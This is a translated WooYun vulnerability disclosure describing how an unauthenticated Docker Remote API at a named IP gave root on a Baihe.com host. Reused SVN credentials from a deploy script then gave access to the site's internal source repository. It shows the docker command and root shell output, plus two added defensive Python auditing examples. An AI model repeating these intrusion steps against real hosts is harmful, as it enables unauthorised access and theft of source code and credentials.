神刀安全网

Vulnerability title: A new trick for obtaining the entire site source code of Baihe.com (百合网)

Vulnerability details

Disclosure status:

2016-05-18: Details were reported to the vendor and are awaiting the vendor's handling
2016-05-23: The vendor has chosen to ignore the vulnerability; details are disclosed to the public

Brief description:

That's right, the code of the entire site.
Don't ask me why I'm this good; just look at my name.

Detailed description:

First, a statement: I did not download the code; the logs can be checked.

Unauthenticated access to the Docker Remote API

Code:
http://123.206.30.193:2375

Current images

Code:
docker -H tcp://123.206.30.193:2375 images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
mysql latest 4f81531a4fa7 2 weeks ago 255.6 MB
docker.baihe.com/nginx 1.8 143b72742691 3 weeks ago 263.3 MB
phpfpm latest c0a91a09e975 3 weeks ago 636.7 MB
docker.baihe.com/php5 latest c0a91a09e975 3 weeks ago 636.7 MB
<none> <none> f2bea71117ab 3 weeks ago 228.9 MB
<none> <none> d397074d70d4 4 weeks ago 228.9 MB
<none> <none> 60e41557d3f3 4 weeks ago 228.9 MB
docker.baihe.com/php5.5 latest 825eb26bb666 4 weeks ago 1.057 GB
docker.baihe.com/php-fpm 6 4ddadfe0897d 5 weeks ago 394.3 MB
<none> <none> a79dfa92a739 6 weeks ago 302.1 MB
centos 6 61bf77ab8841 6 weeks ago 228.9 MB
centos centos6 61bf77ab8841 6 weeks ago 228.9 MB
docker.baihe.com/baiheredis 3.0 0723312bd82e 6 weeks ago 177.5 MB
baihe/redis latest 0723312bd82e 6 weeks ago 177.5 MB
docker.baihe.com/mongo latest 3b43c155fd10 6 weeks ago 309.8 MB
eva/mongo latest 3b43c155fd10 6 weeks ago 309.8 MB
docker.baihe.com/php latest c6cc8696a7cb 8 weeks ago 452.8 MB
eva/php latest c6cc8696a7cb 8 weeks ago 452.8 MB
php 5.6-fpm c6cc8696a7cb 8 weeks ago 452.8 MB
haproxy alpine a49566cd6d57 8 weeks ago 10.63 MB
docker.baihe.com/mysql latest 6863cdbe438e 9 weeks ago 361.2 MB
docker.baihe.com/baihemysql latest b666e9e882a2 9 weeks ago 324.2 MB
mysql 5.6 b666e9e882a2 9 weeks ago 324.2 MB
eva/mysql latest b666e9e882a2 9 weeks ago 324.2 MB
shipyard/shipyard latest a1d73c89bdfa 9 weeks ago 58.67 MB
million12/haproxy latest a5b525064e6c 9 weeks ago 292.8 MB
oblank/docker-centos-nginx-php-mongo-redis-memcached latest df7de2852d68 9 weeks ago 1.64 GB
million12/haproxy 1.6.3-h2 e7bf1090906c 9 weeks ago 292.8 MB
million12/haproxy h2 5d65cd66aede 9 weeks ago 292.8 MB
front-nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
daocloud.io/nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/baihenginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/centos latest bb3d629a7cbc 10 weeks ago 196.6 MB
centos latest bb3d629a7cbc 10 weeks ago 196.6 MB
docker.baihe.com/redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
docker.baihe.com/redis 3.0 8d81cd6f6c5e 10 weeks ago 177.5 MB
eva/redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
redis 3.0 8d81cd6f6c5e 10 weeks ago 177.5 MB
redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
alpine latest 2a250d324882 10 weeks ago 4.794 MB
rethinkdb latest fa65be256431 10 weeks ago 181.8 MB
eva/memcache latest c9df794a0454 10 weeks ago 132.2 MB
memcached 1.4 c9df794a0454 10 weeks ago 132.2 MB
docker.baihe.com/memcache latest c9df794a0454 10 weeks ago 132.2 MB
swarm latest fd056ae2da24 11 weeks ago 18.11 MB
debian wheezy 43d31a5a4c8c 11 weeks ago 84.88 MB
debian jessie a582cd499e0f 11 weeks ago 125.1 MB
daocloud.io/daocloud/daocloud-toolset latest b232d6774447 12 weeks ago 150.2 MB
docker.baihe.com/php-fpm latest 5b0fca6df07d 3 months ago 365.6 MB
bitnami/php-fpm latest 5b0fca6df07d 3 months ago 365.6 MB
jprjr/centos-php-fpm latest d9fce68c8983 3 months ago 392 MB
docker.baihe.com/dockerui latest 95c8b9dc91e0 3 months ago 6.13 MB
dockerui/dockerui latest 95c8b9dc91e0 3 months ago 6.13 MB
internavenue/centos-nginx latest 8329e9f7189d 3 months ago 589 MB
registry latest 07d93e41c370 3 months ago 422.8 MB
jdeathe/centos-ssh centos-6-1.4.1 19c6a20f72e0 4 months ago 253.2 MB
shipyard/docker-proxy latest 68102ad1785d 4 months ago 9.464 MB
shipyard/deploy latest 1f1b0dc17065 8 months ago 6.514 MB
ehazlett/curl latest fa495a510875 8 months ago 8.727 MB
microbox/etcd latest d7522ca4c973 9 months ago 17.86 MB
shipyard/rethinkdb latest 01d0c7f830ab 11 months ago 296.2 MB
<none> <none> dc2342e12c39 11 months ago 143.8 MB
kriation/centos7 latest 0af989cd52ff 15 months ago 223.1 MB
docker.baihe.com/centos7 latest 0af989cd52ff 15 months ago 223.1 MB

The docker.baihe.com registry name shows this belongs to Baihe.com
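The root cause above is a Docker daemon listening for plaintext TCP on 2375 with no authentication; anyone who can reach that port controls the daemon and, through it, the host. The following is an added example (not part of the original report) of a small audit function that reads a daemon.json and flags the weak settings against a hardened one. Both configurations are constructed for the example; the management address 10.0.0.5 and the certificate paths are placeholders.

```python
import json

# Constructed daemon.json contents for demonstration; neither is from the report.
# The insecure form listens for plaintext, unauthenticated TCP on every interface,
# which is exactly the exposure described above (port 2375 open to the internet).
INSECURE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Hardened form: TLS with client-certificate verification, bound to a single
# management address (10.0.0.5 is a placeholder) on the conventional TLS port 2376.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_daemon_config(raw_json):
    """Return a list of findings for a daemon.json; an empty list means no TCP exposure issue."""
    cfg = json.loads(raw_json)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        # Unix socket only: reachable just by local users with access to the socket.
        return findings
    if not cfg.get("tlsverify"):
        findings.append("tcp listener without tlsverify: any client that reaches the port "
                        "controls the daemon, and through it the host")
    for key in ("tlscacert", "tlscert", "tlskey"):
        if key not in cfg:
            findings.append("missing %s" % key)
    for h in tcp_hosts:
        host, _, port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            findings.append("%s binds every interface; bind a dedicated management address" % h)
        if port == "2375":
            findings.append("%s uses the conventional plaintext port 2375" % h)
    return findings


if __name__ == "__main__":
    for name, cfg in (("insecure", INSECURE_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(cfg) or ["ok"])
```

Even with TLS enabled, the port should additionally be restricted by a host or network firewall to the management hosts that actually need it; TLS limits who can talk to the daemon, the firewall limits who can try.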

Magic one-click root on the Docker host machine

id

Code:
[root@VM_15_76_centos ~]# id
uid=0(root) gid=0(root) groups=0(root)

The hosts file also contains baihe.com domain names

Code:
[root@VM_15_76_centos ~]# cat /etc/hosts
127.0.0.1 localhost localhost.localdomain VM_15_76_centos

127.0.0.1 images6.baihe.com
127.0.0.1 images.baihe.com
127.0.0.1 static1.baihe.com
127.0.0.1 static3.baihe.com
127.0.0.1 static4.baihe.com
127.0.0.1 static5.baihe.com
127.0.0.1 static6.baihe.com
127.0.0.1 static8.baihe.com

123.206.30.193 docker.baihe.com
123.206.30.193 shipyard.baihe.com

ifconfig shows the internal IP 10.141.15.76

Code:
[root@VM_15_76_centos ~]# ifconfig
docker0 Link encap:Ethernet HWaddr 06:60:E6:35:CE:0D
inet addr:172.17.42.1 Bcast:0.0.0.0 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4965199 errors:0 dropped:0 overruns:0 frame:0
TX packets:5093629 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11538564202 (10.7 GiB) TX bytes:7761907034 (7.2 GiB)

docker_new0 Link encap:Ethernet HWaddr 42:7A:77:DD:A3:01
inet addr:192.168.6.1 Bcast:192.168.6.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

eth0 Link encap:Ethernet HWaddr 52:54:00:76:48:23
inet addr:10.141.15.76 Bcast:10.141.63.255 Mask:255.255.192.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:95319305 errors:0 dropped:0 overruns:0 frame:0
TX packets:51909292 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24742543618 (23.0 GiB) TX bytes:14247046227 (13.2 GiB)

Files under the /home/work directory

Code:
[root@VM_15_76_centos ~]# cd /home/work/
[root@VM_15_76_centos work]# ls -lh
total 892M
drwxr-xr-x 4 root root 4.0K Mar 18 15:37 backup
drwxr-xr-x 4 root root 4.0K Mar 25 16:52 baihe
drwxr-xr-x 3 root root 4.0K Mar 17 15:10 data
drwxr-xr-x 23 root root 4.0K Apr 27 17:13 docker_file
drwx------ 2 root root 16K Mar 16 17:34 lost+found
-rw-r--r-- 1 root root 261M Apr 27 11:07 nginxa.tar
-rw-r--r-- 1 root root 49 Mar 24 10:31 nginxregistry.log
-rw-r--r-- 1 root root 13 Mar 24 10:30 nginx用户名密码.log
-rw------- 1 root root 133K Mar 29 11:20 nohup.out
-rw-r--r-- 1 root root 631M Apr 27 11:18 phpfpm.tar
drwxr-xr-x 3 root root 4.0K Mar 28 14:33 shipyard
-rw-r--r-- 1 root root 36 Mar 24 18:34 shipyard.log
drwxr-xr-x 3 root root 4.0K Mar 18 10:37 static

Looking at root's .bash_history file yielded the following information

Code:
/home/work/baihe
/home/work/docker_file/nginx/conf.d
/home/work/docker_file/nginx/nginx.conf

Looking at the code, it was all static HTML, JS, images and the like, nothing of value.

Digging further, I found a shell script under /home/work/backup, which turned out to be an automatic SVN update script.

It exposes the SVN username and password.

Code:
[root@VM_15_76_centos backup]# cat update.sh
#!/bin/bash
export LANG=zh_CN.UTF-8

echo 'svn update /home/work/backup/static/'
svn update /home/work/backup/static/ --username [email protected] --password *** --no-auth-cache
#cp -fr /home/work/backup/static/* /home/work/baihe/static/

echo 'svn update /home/work/backup/fronthtml/'
svn update /home/work/backup/fronthtml/ --username [email protected] --password ***** --no-auth-cache
#cp -fr /home/work/backup/fronthtml/* /home/work/baihe/fronthtml/

rsync -auv --exclude='.svn/' /home/work/backup/ /home/work/baihe/

find /home/work/baihe -name ".svn" | xargs rm -rf

echo "update success..."
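The update.sh script above is the kind of artifact a defender can find before an attacker does: a plaintext `--password` on a command line in a file readable by anyone who reaches the host (and, as the report shows, in root's shell history). As an added example that is not part of the original report, the following scanner runs over a constructed script modelled on that pattern and reports hard-coded credentials with their values masked. The sample script, its account names and its secret values are all made up for the example; any real finding should lead to rotating the credential and moving it into a file with restrictive permissions or a secret store, not merely deleting the line.

```python
import re

# Constructed sample script modelled on the update.sh pattern in the report.
# Usernames and secret values here are placeholders, not real credentials.
SAMPLE_SCRIPT = """#!/bin/bash
export LANG=zh_CN.UTF-8
echo 'svn update /home/work/backup/static/'
svn update /home/work/backup/static/ --username deploy@example.com --password S3cretValue --no-auth-cache
rsync -auv --exclude='.svn/' /home/work/backup/ /home/work/baihe/
export DB_PASSWORD=AnotherSecret
mysql -uroot -pRootPw db
echo "update success..."
"""

# Three common shapes of an embedded secret:
#   --password VALUE / --password=VALUE   (svn, curl, many CLIs)
#   -pVALUE glued to a short option        (mysql-style)
#   NAME_PASSWORD=VALUE style assignments  (env exports, config snippets)
CRED_PATTERNS = [
    ("long-option", re.compile(r"--password(?:=|\s+)(\S+)")),
    ("short-option", re.compile(r"(?<!\S)-p(\S+)")),
    ("assignment", re.compile(r"\b\w*(?:PASSWORD|PASSWD|SECRET|TOKEN)\w*\s*=\s*['\"]?([^'\"\s]+)")),
]


def mask(value):
    """Keep the first two characters so a finding can be matched to a known secret without printing it."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)


def find_credentials(script_text):
    """Return (line number, pattern name, masked value) for every embedded credential found.

    Commented-out lines are scanned too: a secret in a comment still leaks.
    """
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for name, pattern in CRED_PATTERNS:
            for match in pattern.finditer(line):
                findings.append((lineno, name, mask(match.group(1))))
    return findings


if __name__ == "__main__":
    for lineno, kind, masked in find_credentials(SAMPLE_SCRIPT):
        print("line %d: %s credential %s" % (lineno, kind, masked))
```

Run it over a deployment tree (for example every .sh file under a backup or release directory) and treat each hit as an incident to rotate, since the script's mtime says nothing about how long the value has been readable.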

Entering the /home/work/baihe/fronthtml/ directory and running svn info gave the SVN address

Code:
http://211.151.58.8:1722/svn

It is reachable from the public internet, but only ever returns 200 OK Service ready.

Testing showed it can only be accessed from the internal network.

I set up a proxy and, using the SVN credentials obtained above, accessed it successfully.

[Screenshot: SVN repository listing]

As can be seen, this is the code of the whole site, including www, ios, android and so on, and all of it is accessible.

A few more screenshots as proof:

[Screenshot: android]

[Screenshot: www]

[Screenshot: ios]

[Screenshot: cms]

I'll stop here.

Proof of vulnerability:

Remediation:

See http://drops.wooyun.org/papers/15892

Can I get a gift?

Copyright notice: when reposting, please credit the source: 黑客,绝对是黑客@乌云 (WooYun)
